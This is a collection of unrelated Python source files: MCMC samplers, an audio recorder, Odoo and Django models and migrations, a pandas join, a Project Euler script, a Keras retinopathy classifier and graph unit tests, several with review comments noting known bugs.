    # Scale each eigenvector: N_i = alpha * sqrt(lambda_i) * V_i.
    alpha = 3
    N1 = np.array([V1[0] * alpha * np.sqrt(abs(Eig[0][0])) , V1[1] * alpha * np.sqrt(abs(Eig[0][0])) ])
    N2 = np.array([V2[0] * alpha * np.sqrt(abs(Eig[0][1])) , V2[1] * alpha * np.sqrt(abs(Eig[0][1])) ])
    # Plot limits: largest projection of the scaled vectors on x and y.
    lx = max(abs(N1[0]), abs(N2[0]))
    ly = max(abs(N1[1]), abs(N2[1]))
    # Plotting domain, translated to the mean.
    x = np.arange(-lx + m1, lx + m1, 0.1)
    y = np.arange(-ly + m2, ly + m2, 0.1)
    X, Y = np.meshgrid(x, y)
    # Evaluate the bivariate density over the grid and draw its contours.
    Z = bivariate_normal(X, Y, s1, s2, m1, m2, ro*s1*s2)
    plt.contour(X,Y,Z, alpha=0.5)
def graficaMuestraBi(m,sigma,w1,n):
    """
    Scatter a size-n bivariate-normal sample drawn with the hybrid-kernel
    MH sampler (kernel-1 probability w1), over the density's contours.

    Input: array, array, float, int (mean, covariance matrix, probability of
    taking the first kernel, sample size)
    Output: shows/saves the figure

    NOTE(review): the savefig/title below read the *global* variable ``ro``
    rather than deriving the correlation from ``sigma`` — this only works
    because the driver sets ``ro`` at module scope before each call.
    """
    M1 = NormalMHMC(m,sigma,w1,n)
    A= M1[:,0]
    B= M1[:,1]
    x = (A).tolist()
    y = (B).tolist()
    #Scatter
    colors = np.arange(0, 1, 1.0/n)
    area = 50*np.ones(n)
    plt.scatter(x, y, s=area, c=colors, alpha=0.8)
    grafBivariada(m,sigma)
    plt.savefig('bivariadaMH'+str(ro)+'-'+str(n)+'.png')
    plt.title('Muestra de tamano '+str(n)+ ' con rho = '+ str(ro))
    plt.show()
def densidad2(a, l, T, b, c):
    """Log posterior density (up to an additive constant) for Weibull(a, l)
    failure times T with priors a ~ exp(c) and l|a ~ Gamma(a, b).

    :param a: Weibull shape alpha (scalar or numpy array — ops broadcast)
    :param l: Weibull rate lambda (scalar or numpy array)
    :param T: iterable of observed failure times
    :param b: Gamma prior hyper-parameter
    :param c: exponential prior rate hyper-parameter
    :return: log-density value
    """
    n = len(T)
    # Sufficient statistics: sum of t**a and sum of log(t).
    # (The original also computed prod(T) here but never used it.)
    sa = sum(t**a for t in T)
    suma = sum(log(t) for t in T)
    return ((n+a-1)*log(l)) - (l*(b+sa)) + (log(b)*a) + (log(a)*n) \
        + (a-1)*suma - (c*a) - loggamma(a)
def grafTiempos(M,T,b,c):
    """
    Contour plot of the log posterior densidad2 over the region covered by
    the sample matrix M (columns: alpha, lambda) for data T and priors b, c.
    """
    # Axis bounds from the sample, floored at 0.1 to stay in the support.
    A=min(0.1, min(M[:,0]))
    B=max(M[:,0])
    C=min(0.1, min(M[:,1]))
    D=max(M[:,1])
    # Contour grid.
    delta = 0.25
    x = np.arange(A, B+ 2*delta, delta)
    y = np.arange(C, D+ 2*delta, delta)
    X, Y = np.meshgrid(x, y)
    Z = densidad2(X,Y,T,b,c)
    ma= np.amax(Z)
    mi= np.amin(Z)
    plt.figure()
    plt.contour(X, Y, Z, levels=np.arange(mi,ma,5))
def NormalMHMC(m, sigma, w1, tam):
    """Hybrid-kernel Metropolis-Hastings for a bivariate normal target.

    At each step, with probability w1 the first coordinate is redrawn from
    its full conditional given the second; otherwise the second coordinate
    is redrawn given the first (Gibbs-style proposals, always accepted).

    Input: mean (2x1 array), covariance (2x2 array), kernel-1 probability,
    chain length. Output: (tam, 2) array of samples, started at the mean.
    """
    chain = zeros((tam, 2))
    mu1, mu2 = m[0, 0], m[1, 0]
    sd1 = np.sqrt(sigma[0, 0])
    sd2 = np.sqrt(sigma[1, 1])
    corr = sigma[0, 1] / (sd1 * sd2)
    # Start the chain at the mean.
    chain[0, 0], chain[0, 1] = mu1, mu2
    for step in range(1, tam):
        if Bernoulli(w1) == 1:
            prev2 = chain[step-1, 1]
            # NOTE(review): numpy.random.normal takes a *std dev* as its
            # second argument, but a variance expression is passed here —
            # preserved exactly as in the original.
            chain[step, 0] = normal(mu1 + corr*sd1*(prev2-mu2)/sd2,
                                    (sd1**2)*(1-corr**2))
            chain[step, 1] = prev2
        else:
            prev1 = chain[step-1, 0]
            chain[step, 1] = normal(mu2 + corr*sd2*(prev1-mu1)/sd1,
                                    (sd2**2)*(1-corr**2))
            chain[step, 0] = prev1
    return chain
def propuesta(numP,a,l,b,c,sigma,T):
    """
    Generate an MH proposal for (alpha, lambda) according to the selected
    kernel and return it with its acceptance probability.

    Input: numP in 1..4 (kernel choice), current a (alpha) and l (lambda),
    hyper-parameters b and c, RW step size sigma, data T.
    Output: (ap, lp, rho) — proposed alpha, proposed lambda, acceptance
    probability.
    :raises ValueError: if numP is not in 1..4

    NOTE: in branches 2-4 the parameter name ``c`` is rebound to
    min(0, log-ratio) before exponentiation; the prior hyper-parameter is
    always read before the rebinding, so the reuse is safe (if confusing).
    """
    n=len(T)
    if numP>4 or numP<1:
        raise ValueError("No conozco esa propuesta")
    if numP==1:
        # Kernel 1: Gibbs draw of lambda from its full conditional.
        sa=0
        for t in T:
            sa = sa + t**a
        # proposal
        lp= gamma(a + n , 1.0/(b + sa))
        ap= a
        # acceptance probability (Gibbs proposals are always accepted)
        ro = 1
        return ap,lp,ro
    elif numP==2:
        # Kernel 2: Gamma proposal for alpha, lambda kept fixed.
        r1=1.0
        for t in T:
            r1 = r1 * t
        # proposal
        ap = gamma(n + 1 , 1.0/(-log(b)-log(r1)+c))
        lp = l
        # acceptance probability from the posterior/proposal log-ratio
        sap=0
        for t in T:
            sap = sap + t**ap
        sa=0
        for t in T:
            sa = sa + t**a
        aux = float(loggamma(a)) + (ap-a)*l - l*sap-float(loggamma(ap)) + l*sa
        c=min(0,aux)
        return ap,lp,exp(c)
    elif numP==3:
        # Kernel 3: independence proposal from the prior.
        ap = exponential(c)
        lp = gamma(ap , 1.0/b)
        # acceptance probability
        sap=0.0
        for t in T:
            sap = sap + t**ap
        sa=0.0
        for t in T:
            sa = sa + t**a
        r1=1.0
        for t in T:
            r1= r1*t
        aux = n*log((ap*lp)/(a*l)) + (ap-a)*log(r1)- lp*sap + l*sa
        c=min(0,aux)
        return ap,lp,exp(c)
    else:
        # Kernel 4: random-walk MH on alpha, lambda kept fixed.
        ap=a + normal(0,sigma)
        lp= l
        suma=0
        for t in T:
            suma = suma + log(t)
        sap=0
        for t in T:
            sap = sap + t**ap
        sa=0
        for t in T:
            sa = sa + t**a
        aux = ap*log(l)-l*(b+sap)+ap*log(b)+n*log(ap)+(ap-1)*suma-c*ap-float(loggamma(ap))-a*log(l)+l*(b+sa)-a*log(b)-n*log(a)-(a-1)*suma+c*a+float(loggamma(a))
        c=min(0,aux)
        return ap,lp,exp(c)
def TiemposMHMC(c,b,sigma,tam,T):
    """
    Hybrid-kernel MH sampler for the posterior f(alpha, lambda | T) of
    Weibull failure times with priors alpha ~ exp(c), lambda|alpha ~
    Gamma(alpha, b).

    At every step one of the four kernels implemented in ``propuesta`` is
    picked uniformly at random:
      1. lambda | alpha, T ~ Gamma(alpha + n, b + sum(t_i^alpha))  (Gibbs)
      2. alpha | lambda, T ~ Gamma(n + 1, -log(b) - log(prod t_i) + c)
      3. alpha ~ exp(c), lambda | alpha ~ Gamma(alpha, b)  (prior draw)
      4. RWMH: alpha' = alpha + N(0, sigma), lambda fixed.

    Input: c, b (prior hyper-parameters), sigma (RW step), tam (chain
    length), T (data).
    Output: (tam, 2) array of (alpha, lambda) samples; also prints the
    rejection percentage.
    """
    dim = 2
    M = zeros((tam, dim))
    # Rejection counter.
    ef=0.0
    # Initial state drawn from the prior.
    M[0,0] = exponential(1)
    M[0,1] = gamma(M[0,0], 1)
    for i in range(1,tam):
        a=M[i-1][0]
        l=M[i-1][1]
        # Pick one of the four kernels uniformly.
        numP = int(4*rand(1)[0])+1
        R = propuesta(numP,a,l,b,c,sigma,T)
        ap = R[0]
        lp = R[1]
        ro = R[2]
        # Accept with probability ro, otherwise repeat the previous state.
        if Bernoulli(ro) == 1.0:
            M[i,0] = ap
            M[i,1] = lp
        else:
            M[i,0] = M[i-1,0]
            M[i,1] = M[i-1,1]
            ef=ef+1
    print ("Se rechazaron el "+ str(ef*100.0/tam)+ "% de las propuestas")
    return M
def bombasAguaMHMC(a,c,d,tam,w1):
    """
    Gibbs-style hybrid-kernel sampler for the pump-failure posterior
    f(lambda_1..lambda_n, beta | p), with proposals
        lambda_i ~ Gamma(p_i + a, beta + t_i)
        beta     ~ Gamma(n*a + c, d + sum(lambda))
    and prior hyper-parameters a (alpha), c (gamma), d (delta).

    Input: a (float), c (float), d (float), tam (int, chain length),
    w1 (float, probability of moving the lambdas instead of beta)
    Output: (tam x 11) array — columns 0-9 are the lambda chains, column
    10 is beta.
    """
    # Pump data: column 0 = operating time t_i, column 1 = failure count p_i.
    D = np.array([[94.32, 5],[15.72, 1],[62.88, 5],[125.76, 14],[5.24, 3],
                  [31.44, 19],[1.05, 1],[1.05, 1],[2.1, 4],[10.48, 22]])
    n=len(D)
    dim = n+1
    M = zeros((tam, dim))
    # Initial state drawn from the priors.
    M[0,n] = gamma(c, 1.0/(d)) #Beta a priori
    M[0,0:n] = gamma(a,1.0/(M[0,n]),n) #Lambdas a priori
    for i in range(1,tam):
        b= M[i-1,n]
        L=M[i-1,0:n]
        if Bernoulli(w1) == 1.0:
            # Keep beta fixed...
            M[i,n]=b
            # ...and redraw every lambda from its full conditional.
            for j in range(0,n):
                #M[i,j]= gamma(D[j,0]*D[j,1] + a, 1.0/(b+1) )
                M[i,j]= gamma(D[j,1] + a, 1.0/(b+D[j,0]) )
        else:
            # Redraw beta from its full conditional...
            M[i,n]=gamma(n*a + c,1.0/(d+sum(L)))
            # ...keeping the lambdas fixed.
            M[i,0:n] = L
    return M
def graficaColumnas(M):
    """Plot each pump's simulated lambda chain (10 panels) with its mean.

    M is the (tam x 11) sample matrix from bombasAguaMHMC: columns 0-9 are
    the lambda_i chains, column 10 is beta. The first 10 samples are
    discarded as burn-in. Saves the figure to 'lambdas.png' and prints each
    chain's mean. (The original docstring was copy-pasted from
    bombasAguaMHMC and described the wrong function.)
    """
    r=4
    c=3
    f, axarr = plt.subplots(r, c,figsize=(8, 6), dpi=80)
    C=np.ones(len(M))
    for j in range(0,9):
        p= np.mean(M[10:,j])
        # Bug fix: subplot indices must be integers — the original used
        # `j/c`, which is a float under Python 3 and cannot index `axarr`.
        axarr[j//c, j%c].plot(M[10:,j],'o',markersize=2.5,alpha=0.3,color='#009999')
        axarr[j//c, j%c].plot(C*p,linewidth=3,color='#990033')
        axarr[j//c, j%c].set_title('lambda'+str(j+1))
        axarr[j//c, j%c].set_xticklabels([])
        print ("El promedio de lambda"+str(j+1)+" es " + str(p))
    # The tenth chain goes in the bottom-middle panel.
    p= np.mean(M[10:,9])
    axarr[3, 1].plot(M[10:,9],'o',markersize=2.5,alpha=0.3,color='#009999')
    axarr[3, 1].plot(C*np.mean(M[10:,9]),linewidth=3,color='#990033')
    axarr[3, 1].set_title('lambda10')
    print ("El promedio de lamda10 es " + str(p))
    # Cosmetics: blank out the two unused corner panels.
    f.subplots_adjust(hspace=0.4)
    for t in [0,2]:
        axarr[3,t].spines['bottom'].set_color('white')
        axarr[3,t].spines['left'].set_color('white')
        axarr[3,t].spines['top'].set_color('white')
        axarr[3,t].spines['right'].set_color('white')
        for s in axarr[3,t].xaxis.get_ticklines(): s.set_color('white')
        for s in axarr[3,t].yaxis.get_ticklines(): s.set_color('white')
        plt.setp([axarr[3,t].get_yticklabels()], visible=False)
    for j in range(0,r):
        plt.setp([a.get_xticklabels() for a in axarr[j, :]], visible=False)
    plt.savefig('lambdas.png')
    plt.show()
def evalua(M):
    """Scatter-plot the log of the sample values against their index."""
    count = len(M)
    xs = np.arange(0., count, 1)
    ys = log(M)
    shades = np.arange(0, 1, 1.0/count)
    sizes = 30*np.ones(count)
    plt.scatter(xs, ys, s=sizes, c=shades, alpha=0.8)
    plt.show()
if __name__ == "__main__":
    # --- Part 1: MH with hybrid Gibbs kernels on a bivariate normal ------
    # sigma1 = sigma2 = 1; correlations 0.8 and 0.99; samples of 1000 and
    # 10000. graficaMuestraBi reads the module-level `ro` for its filename,
    # so `ro` must be (re)assigned at this scope before each call.
    for n in [1000,10000]:
        m = np.array([[0],
                      [0]])
        w1=0.5
        # Case rho = 0.8
        ro = 0.8
        sigma = np.array([[1, ro],
                          [ro, 1]])
        graficaMuestraBi(m,sigma,w1,n)
        # Case rho = 0.99
        ro = 0.99
        sigma = np.array([[1, ro],
                          [ro, 1]])
        graficaMuestraBi(m,sigma,w1,n)
    # --- Part 2: posterior of Weibull failure times ----------------------
    # Data simulated with alpha = 1, lambda = 1, n = 20; priors c = b = 1.
    n=1000
    T = weibull(1,20)
    M = TiemposMHMC(1,1,0.1,n,T)
    grafTiempos(M,T,1,1)
    A= M[:,0]
    B= M[:,1]
    x = (A).tolist()
    y = (B).tolist()
    # Scatter of the chain over the posterior contours.
    colors = np.arange(0, 1, 1.0/n)
    area = 50*np.ones(n)
    plt.scatter(x, y, s=area, c=colors, alpha=0.5)
    plt.savefig('tiemposMH'+str(n)+'.png')
    plt.title('Muestra de tamano '+str(n))
    plt.show()
    # --- Part 3: pump-failure Gibbs sampler ------------------------------
    # Priors: alpha = 1.8, gamma = 0.01, delta = 1 (Cuadro 1 data).
    tam=1000
    a=1.8
    c=0.01
    d=1
    w1=0.5
    M = bombasAguaMHMC(a,c,d,tam,w1)
    graficaColumnas(M)
    C=np.ones(len(M))
    plt.figure(num=None, figsize=(3, 3), dpi=80)
    plt.plot(M[10:,10],'o',markersize=5,alpha=0.3,color='#ffcc00')
    p = np.mean(M[10:,10])
    plt.plot(C*p,linewidth=3,color='#990033')
    plt.title('Betas simuladas con Gibs sampler')
    plt.savefig('betas.png')
    plt.show()
    print ("El promedio de beta es " + str(p))
    # Posterior means of each chain (columns 0-9: lambdas, 10: beta).
    lambdas= np.zeros(11)
    for j in range(0,11):
        lambdas[j]=np.mean(M[10:,j])
    # Bug fix: `D` was a local variable of bombasAguaMHMC and was undefined
    # here, so the original raised NameError. Re-declare the pump table
    # (operating time, failure count) for the posterior-predictive check.
    D = np.array([[94.32, 5],[15.72, 1],[62.88, 5],[125.76, 14],[5.24, 3],
                  [31.44, 19],[1.05, 1],[1.05, 1],[2.1, 4],[10.48, 22]])
    for j in range(0,10):
        print (np.mean(poisson(lambdas[j]*D[j,1],1000)))
20,769 | daba5b69d1a3bf3dbbfda53fe1b34b4349cea37f | import sounddevice as sd
import soundfile as sf
import queue
import datetime;
import sys
import os
q = queue.Queue()
def callback(indata, frames, time, status):
    """This is called (from a separate thread) for each audio block.

    Copies the captured block onto the module-level queue so the main
    thread can write it to disk; any non-empty status flag (e.g. an
    over/underrun) is reported to stdout first.
    """
    if status:
        print(status)
    # Copy: sounddevice reuses the indata buffer between callbacks.
    q.put(indata.copy())
# Record mono audio from the input device given as argv[1] into a
# timestamped WAV file until interrupted with Ctrl-C.
fileName= datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filePath='./audios/wav/' + fileName + '.wav'
# 'x' mode: fail rather than overwrite an existing file.
mode='x'
channels=1
device=int(sys.argv[1])
device_info = sd.query_devices(device, 'input')
# Use the device's native sample rate.
samplerate = int(device_info['default_samplerate'])
try:
    with sf.SoundFile(filePath, mode=mode, samplerate=samplerate, channels=channels) as file:
        with sd.InputStream(samplerate=samplerate, device=device, channels=channels, callback=callback):
            # Announce the file name as JSON on stdout for the caller.
            print('{"name": "' + fileName + '"}')
            sys.stdout.flush()
            # Drain queued audio blocks (filled by callback) to disk forever.
            while True:
                file.write(q.get())
except KeyboardInterrupt:
    # Normal termination path: Ctrl-C ends the recording.
    print('\nRecording finished: ' + filePath)
    sys.stdout.flush()
    exit()
except Exception as e:
    print(e)
    sys.stdout.flush()
exit() |
20,770 | cf7611195ed56c0ee7fb57577642e58dd6b970c8 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from datetime import datetime
class Mes(models.Model):
    """Month/year record used to label expenses (gastos) periods."""
    _name = 'gastos_mes.mes'

    mes = fields.Char(string='mes', required=True)
    anio = fields.Integer(string='anio', required=True)

    def get_mes(self):
        """Return selection-style pairs [(id, "mes - anio")] per record.

        Bug fixes: the original rebound the accumulator list to a string
        inside the loop, concatenated the Integer field `anio` directly to
        a str (TypeError), and then called .append on that string.
        """
        result = []
        for c in self:
            label = '%s - %s' % (c.mes, c.anio)
            result.append((c.id, label))
        return result
|
20,771 | e1f24a0c57287914636702bb80b8537229bbf55e |
import pandas as pd
import numpy as np
# As-of join experiment: for every (id, reg) row in df, find the latest
# diagnosis row in df_x with the same id and reg <= the target reg, by
# encoding (id, reg) into a single sortable key and using searchsorted.
MAX_DIAGNOSIS_AGE = 5
l_id = [0, 2, 3, 4, 4, 9]
l_reg = [1 , 1, 5, 3, 2, 0]
df = pd.DataFrame({'id': l_id, 'reg' : l_reg})
l_id = [0, 2, 5, 4, 9]
l_reg = [3, 2, 4, 2, 11]
l_value = [9, 134, 12, 2, 17]
df_x = pd.DataFrame({'id': l_id, 'reg': l_reg, 'd' : l_value})
# Combined key idx = reg + offset * id is collision-free because
# offset > every reg value; the asserts verify the encoding round-trips.
reg_max = np.max([df_x.reg.max(), df.reg.max()])
reg_offset = reg_max + 1
df_x = df_x.assign(idx = df_x.reg + reg_offset * df_x.id)
assert (df_x.reg == df_x.idx%reg_offset).all()
assert (df_x.id == df_x.idx//reg_offset).all()
df = df.assign(idx = df.reg + reg_offset * df.id)
assert (df.reg == df.idx%reg_offset).all()
assert (df.id == df.idx//reg_offset).all()
# searchsorted requires both key arrays sorted.
df = df.sort_values(by = 'idx').reset_index(drop = True)
df_x = df_x.sort_values(by = 'idx').reset_index(drop = True)
idx_x = np.array(df_x.idx)
idx_t = np.array(df.idx)
# Rightmost df_x position with key <= the target key; -1 = no candidate.
i_hit = np.searchsorted(idx_x, idx_t, side = 'right')
i_hit = i_hit - 1
m_exists = (i_hit >= 0) & (i_hit < df_x.shape[0])
i_hit[~m_exists] = -1
# x_id: the id of the matched df_x row (-1 when none, -2 = unfilled guard).
x_id = np.empty_like(np.array(df.id))
x_id[:] = -2
x_id[~m_exists] = -1
x_id[m_exists] = df_x.loc[i_hit[m_exists]].id
assert (x_id != -2).all()
# A hit only counts when the matched row belongs to the same id.
id_match = (df.id >=0) & (df.id == x_id)
i_hit[~id_match] = -1
df = df.assign(hit = i_hit)
df_x = df_x.assign(index = df_x.index)
df = df.merge(df_x[['d', 'index', 'reg', 'id']], how = 'left', left_on = df.hit, right_on = 'index')
del df_x
df = df.drop(['index', 'hit'], axis = 1)
d = df.d.fillna(0).astype(np.int32)
df = df.drop('d', axis = 1)
reg_diag = df.reg_y.fillna(0).astype(np.int32)
df = df.drop('reg_y', axis = 1)
# Zero out diagnoses that are in the future or older than the cutoff.
diagnose_age = df.reg_x - reg_diag
m = diagnose_age >= 0
d[~m] = 0
m = diagnose_age < MAX_DIAGNOSIS_AGE
d[~m] = 0
df = df.assign(d = d)
df = df.drop(['idx'], axis = 1)
df = df.assign(id_y = df.id_y.fillna(0).astype(np.int32))
# Sanity: every retained diagnosis belongs to the matching id.
assert (df[df.d !=0].id_x == df[df.d !=0].id_y).all()
df = df.drop(['id_y'], axis = 1)
npuint64_info = np.iinfo(np.uint64)
npuint64_info.max
|
20,772 | 6fbc018f6cf22c079ad7c39ae973b5eb6267878e | from sympy import divisors
# --- Incomplete ---
SMALLEST = 12 # 12 is the lowest abundant number
LIMIT = 28123 # All numbers above this can be the sum of two abundant numbers
def proper_divisors(number):
    """Return the proper divisors of *number* (all divisors except itself).

    :param number: int
    :return: list of ints
    """
    return [d for d in divisors(number) if d != number]
def perfect_number(number):
    """Classify *number* by the sum of its proper divisors.

    :param number: int
    :return: 'perfect' when the sum equals the number, 'abundant' when it
             exceeds it, 'deficient' otherwise
    """
    divisor_sum = sum(proper_divisors(number))
    if divisor_sum == number:
        return 'perfect'
    return 'abundant' if divisor_sum > number else 'deficient'
def is_abundant(check_number):
    """
    Return True if *check_number* is abundant, i.e. the sum of its proper
    divisors exceeds the number itself.
    :param check_number: int
    :return: bool
    """
    # Bug fix: the original compared against the *global* name ``number``
    # instead of the ``check_number`` parameter, so the result depended on
    # unrelated module state.
    return check_number < sum(proper_divisors(check_number))
# Get a list of abundant numbers
abundant_numbers = [number for number in range(SMALLEST, LIMIT)
                    if perfect_number(number) == 'abundant']
print(abundant_numbers)
"""
What do we want?
Sum of positive integers that cannot be expressed as the sum of two abundant numbers
12 is the smallest abundant number, therefore 11! must be part of the total sum
all integers > 28123 can be written as the sum of two abundant, giving a limit.
What have we got?
A list of all abundant numbers.
"""
# Bug fix: the original inner loop appended unrelated values and never
# tested expressibility.  Instead, mark every value <= LIMIT that IS the
# sum of two abundant numbers, then total everything left unmarked.
is_sum_of_two = [False] * (LIMIT + 1)
for first_index, first in enumerate(abundant_numbers):
    for second in abundant_numbers[first_index:]:
        pair_sum = first + second
        if pair_sum > LIMIT:
            break  # abundant_numbers is ascending; later sums only grow
        is_sum_of_two[pair_sum] = True
answer = [value for value in range(1, LIMIT + 1) if not is_sum_of_two[value]]
print(sum(answer))
print(f'Sum is {sum(answer)}')
|
20,773 | fcd478e4b91ca49559f3f03fa5addb6829d7261b | # Generated by Django 2.0.1 on 2018-01-18 19:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 2.0.1) schema change for the ``stats`` app.

    Drops the two timestamp columns from ``Stat`` and relaxes several
    fields (blank-able char fields, a fixed upload path).
    """
    dependencies = [
        ('stats', '0004_auto_20180116_2114'),
    ]
    operations = [
        # Both date columns are removed from the model.
        migrations.RemoveField(
            model_name='stat',
            name='created_date',
        ),
        migrations.RemoveField(
            model_name='stat',
            name='published_date',
        ),
        # Remaining fields become optional (blank=True) where noted.
        migrations.AlterField(
            model_name='stat',
            name='author',
            field=models.CharField(blank=True, default='anonymous', max_length=200),
        ),
        migrations.AlterField(
            model_name='stat',
            name='name',
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name='stat',
            name='tag',
            field=models.CharField(blank=True, max_length=1000),
        ),
        migrations.AlterField(
            model_name='stat',
            name='upload',
            field=models.FileField(upload_to='media/'),
        ),
    ]
|
20,774 | bba27853aac7d5a41481e4822ae42958be74619f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated schema change for the ``ideascale`` app.

    Makes the vote/comment counters on ``Comment`` and ``Idea`` nullable
    (all except ``Comment.positive_votes``, which stays required).
    """
    dependencies = [
        ('ideascale', '0007_auto_20150429_1503'),
    ]
    operations = [
        migrations.AlterField(
            model_name='comment',
            name='comments',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='comment',
            name='negative_votes',
            field=models.PositiveIntegerField(null=True),
        ),
        # NOTE: this one intentionally remains NOT NULL.
        migrations.AlterField(
            model_name='comment',
            name='positive_votes',
            field=models.PositiveIntegerField(),
        ),
        migrations.AlterField(
            model_name='idea',
            name='comments',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='idea',
            name='negative_votes',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='idea',
            name='positive_votes',
            field=models.PositiveIntegerField(null=True),
        ),
    ]
|
20,775 | f43cc844a8f74ff1b15dfa1fa60d087dbf9e926a | import numpy as np
import os
import time
from keras.applications.inception_v3 import InceptionV3
from keras.preprocessing import image
from keras.layers import GlobalAveragePooling2D, Dense, Dropout,Activation,Flatten
from keras.applications.resnet50 import preprocess_input,decode_predictions
from keras.models import load_model
#from imagenet_utils import preprocess_input
from keras.layers import Input
from keras.models import Model
from keras.utils import np_utils
from sklearn.utils import shuffle
from sklearn.cross_validation import train_test_split
import pandas as pd
import random
PATH = os.getcwd()
# Define data path
data_path = PATH + '/data'
data_dir_list = os.listdir(data_path)
img_data_list=[]
# Load up to 3000 randomly-chosen images from each dataset folder and
# preprocess them to the 299x299 input size expected by InceptionV3.
for dataset in data_dir_list:
    img_list=os.listdir(data_path+'/'+ dataset)
    random.shuffle(img_list)
    img_list=img_list[0:3000]
    print ('Loaded the images of dataset-'+'{}\n'.format(dataset))
    # NOTE: ``img`` is reused — first it is the file name, then the PIL image.
    for img in img_list:
        img_path = data_path + '/'+ dataset + '/'+ img
        img = image.load_img(img_path, target_size=(299, 299))
        x = image.img_to_array(img)
        x = np.expand_dims(x, axis=0)
        x = preprocess_input(x)
        #print('Input image shape:', x.shape)
        img_data_list.append(x)
img_data = np.array(img_data_list)
#img_data = img_data.astype('float32')
print (img_data.shape)
# Collapse the singleton batch axis added by expand_dims:
# (N, 1, 299, 299, 3) -> (N, 299, 299, 3).
img_data=np.rollaxis(img_data,1,0)
print (img_data.shape)
img_data=img_data[0]
print (img_data.shape)
# Define the number of classes
num_classes = 5
num_of_samples = img_data.shape[0]
# Default label is 1 for every sample (np.ones), overwritten below.
labels = np.ones((num_of_samples,),dtype='int64')
'''
labels[0:202]=0
labels[202:404]=1
labels[404:606]=2
labels[606:]=3
'''
# Build a file-name -> grade lookup from the CSV (column 0: image id
# without extension, column 1: label).
data=pd.read_csv('trainLabels.csv')
data= np.array(data)
r,c =data.shape
mp={}
for i in range(0,r):
    mp[str(str(data[i][0])+'.jpeg')] = data[i][1]
i=0
src_path='./data/train001_CLAHE_299by299/'
dirs=os.listdir(src_path)
# NOTE(review): ``img_list`` here is the leftover list from the *last*
# folder of the loading loop above, so these labels are probably not
# aligned with ``img_data`` — verify before trusting training results.
for img in img_list:
    if not(os.path.isfile(src_path+img)) or (not(img.endswith('.jpeg'))):
        continue
    labels[i]=(mp.get(img))
    i=i+1
names = ['NoDR','EarlyDR','ModerateDR','SevereDR','NPDR']
# convert class labels to on-hot encoding
Y = np_utils.to_categorical(labels, num_classes)
#Shuffle the dataset
x,y = shuffle(img_data,Y, random_state=2)
# Split the dataset
X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.2)
#using pre trained weights and fine tuning
image_input = Input(shape=(299, 299, 3))
# NOTE(review): include_top=True keeps the 1000-way ImageNet softmax, so
# the dense head below is stacked on softmax *probabilities*; the usual
# fine-tuning setup is include_top=False plus pooling — confirm intent.
model = InceptionV3(input_tensor=image_input, include_top=True,weights='imagenet')
model.summary()
last_layer = model.output
#x= Flatten(name='flatten')(last_layer)
#x = GlobalAveragePooling2D()(last_layer)
# add fully-connected & dropout layers
#x = Flatten()(x)
x = Dense(512, activation='relu',name='fc-1')(last_layer)
x = Dropout(0.5)(x)
x = Dense(256, activation='relu',name='fc-2')(x)
x = Dropout(0.5)(x)
# a softmax layer for 5 classes
out = Dense(num_classes, activation='softmax',name='output_layer')(x)
#out = Dense(5, activation='softmax', name='output_layer')(last_layer)
custom_resnet_model = Model(inputs=image_input,outputs= out)
custom_resnet_model.summary()
# Freeze everything except the newly added head (last 6 layers).
for layer in custom_resnet_model.layers[:-6]:
    layer.trainable = False
# NOTE(review): the next line only *reads* the attribute and discards the
# value (there is no ``= True``), so it has no effect.
custom_resnet_model.layers[-1].trainable
custom_resnet_model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
# Train the head, timing the fit, then evaluate on the held-out split.
t = time.time()
hist = custom_resnet_model.fit(X_train, y_train, batch_size=32, epochs=20, verbose=1, validation_data=(X_test, y_test))
#custom_resnet_model.save('ResNet50_only_classifier_trained.h5')
# Bug fix: elapsed time is now - start; the original printed the
# negative value (t - time.time()).
print('Training time: %s' % (time.time() - t))
(loss, accuracy) = custom_resnet_model.evaluate(X_test, y_test, batch_size=10, verbose=1)
print("[INFO] loss={:.4f}, accuracy: {:.4f}%".format(loss,accuracy * 100))
|
20,776 | eca4a228f7690144035fb777d113017181cd60b0 | import unittest
import lesson18_graf as l
class GraphTest(unittest.TestCase):
    """Unit tests for lesson18_graf.SimpleGraph (adjacency-matrix graph).

    Vertices are addressed by index; ``m_adjacency`` is the square 0/1
    adjacency matrix the implementation exposes directly, so several
    tests seed it by hand.
    """
    def test_add_vertex(self):
        g = l.SimpleGraph(4)
        vertexes = [i for i in range(4)]
        for v in vertexes:
            g.AddVertex(v)
        self.assertEqual(len(g.m_adjacency), 4)
        self.assertEqual(len(g.m_adjacency[0]), 4)
        # Growing past the initial capacity must extend the matrix.
        new_vertex = l.Vertex(4)
        g.AddVertex(new_vertex)
        self.assertEqual(len(g.m_adjacency), 5)
        self.assertEqual(len(g.m_adjacency[0]), 5)
        self.assertEqual(g.m_adjacency[0], [0, 0, 0, 0, 0])
    def test_add_edge(self):
        g = l.SimpleGraph(5)
        vertexes = [i for i in range(5)]
        for i in vertexes:
            g.AddVertex(i)
        # Edges are undirected: both matrix cells must be set.
        g.AddEdge(0, 1)
        self.assertListEqual(g.m_adjacency[0], [0, 1, 0, 0, 0])
        self.assertListEqual(g.m_adjacency[1], [1, 0, 0, 0, 0])
        g.AddEdge(4, 1)
        self.assertListEqual(g.m_adjacency[1], [1, 0, 0, 0, 1])
        self.assertListEqual(g.m_adjacency[4], [0, 1, 0, 0, 0])
    def test_remove_vertex(self):
        g = l.SimpleGraph(5)
        vertexes = [i for i in range(5)]
        for v in vertexes:
            g.AddVertex(v)
        g.AddEdge(vertexes[0], vertexes[1])
        g.AddEdge(vertexes[4], vertexes[1])
        # Removing a vertex shrinks the matrix and drops its edges.
        g.RemoveVertex(1)
        self.assertListEqual(g.m_adjacency[0], [0, 0, 0, 0])
        self.assertListEqual(g.m_adjacency[1], [0, 0, 0, 0])
